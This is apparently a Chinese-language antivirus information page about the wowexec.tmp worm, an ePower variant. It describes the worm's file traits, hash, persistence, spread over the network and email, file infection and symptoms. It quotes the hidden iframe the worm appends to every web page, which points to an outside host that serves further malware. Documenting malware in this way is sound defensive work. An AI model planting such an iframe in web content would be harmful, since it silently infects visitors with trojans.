wowexec.tmp病毒专杀
wowexec.tmp病毒特征:
病毒别名:wowexec.tmp是ePower的新变种
危险级别:★★★☆
中文名称:科多兽
病毒类型:蠕虫
影响系统:Win 9x/ME,Win 2000/NT,Win XP,Win 2002
360安全卫士对wowexec.tmp病毒识别如下:
名称:wowexec.tmp
组别:100 - 进程项
安全级别: 未知
文件版本:5.1.2600.2180
MD5值:63fdc1c56288868be7d4d43f10250cd1
路径:C:\Documents and Settings\用户名\Local Settings\Temp\wowexec.tmp
命令行:C:\DOCUME~1\用户名\LOCALS~1\Temp\wowexec.tmp
文件描述:Asynchronous Media Library
出品公司:Microsoft Corporatio
文件大小:91 KB
wowexec.tmp病毒行为:
这是个感染型的蠕虫病毒变种,感染扩展名为.exe、.asp、.aspx、.htm以及.html的文件,被该变种感染后的.exe文件大部分会损坏,无法恢复,病毒自身会通过局域网和邮件传播.
1、病毒运行后会从资源释放文件到到%temp%目录,文件名为随即生成.该资源类型为EXEFILE,名称为EXE.
2、创建进程运行该释放的文件.
3、修改注册表,创建名字为SysDrver的服务,实现开机自启.
4、监测自身文件名是否为ePower.exe,若不是执行(5),否则执行(6).
5、复制自身到%system%\ePower.exe,并运行,退出自身进程.
6、从资源中释放驱动文件到%system%目录下,文件名随机(扩展名为sys).之后会删除该文件.
7、创建一个MUTEX监测自身是否为第一个运行实例,若不是,则进程终止.
8、在临时文件夹生成很多病毒文件,并占用cpu使系统非常缓慢.
病毒在temp目录下生成wowexec.tmp 和MediaSups.exe文件后还会继续生成一些乱七八糟的.exe 和.tmp 文件 在temp文件夹中于这几个wowexec.tmp tsepuehu.dll 文件在同一时刻建立了好多无后缀名文件如“cDXQMdsY ”“WJvZump”等,绝大多数文件的大小为812k,同时内容一致.
9、创建线程,功能如下:
线程1:枚举网络可用资源,尝试通过IPC连接传播自身;发送邮件,通过email传播自身
线程2:从Z盘到B盘,搜索所有exe、asp、aspx、htm、html为扩展名的文件,并感染(系统盘除外).
wowexec.tmp病毒感染exe文件方式病毒将自身复制到%tmp%目录下的随机文件名文件,读取欲感染的文件,并将其加入到病毒副本资源的 EXEFILE类型的EXE.用该病毒副本覆盖于感染的文件完成感染,删除副本.
由于该变种自身原因,被感染的.exe文件都被损坏,无法恢复且感染后病毒自身也无法运行.建议删除文件.
wowexec.tmp病毒感染htm网页文件方式:
线程3:连接网络下载其他病毒
只要一运行该病毒,几秒钟之内将会把整个硬盘的所有网页文件感染,所有网页文件代码最后都被添加
<iframe src=http://wm.168080.com/wm/wm.htm width=0 height=0></iframe>
这样只要连网,就会再次染毒!然后再通过网页下载其它木马和病毒.
wowexec.tmp病毒它不是简单的备份文件,无论用什么简单方法都无法永久删除,而且染上它之后,每打开一
个应用程序,都能在你的C:\Documents and Settings\new\Local Settings\Temp目录下生成一个 MediaSups.exe程序,阻止你应用这个软件,并将此软件的的程序感染.
还有一个明显的特征,只要进程当中有wowexec.tmp,你的CPU应用将达到接近100%,以至无法正常使用杀毒
软件.并且无休止的在C:\Documents and Settings\new\Local Settings\Temp中增加.dll文件和.exe文件, 直至充满C盘.并且自动生成开机自动运行文件,无论多少次重新启动,它都会自动运行.
对了,进程中的zts2.exe 、wlzs.exe 、rxzs.exe 、mhs2.exe 都是这个病毒所生成的程序.进入
C:\Documents and Settings\new\Local Settings\Temp目录就看到他们了.
专杀下载
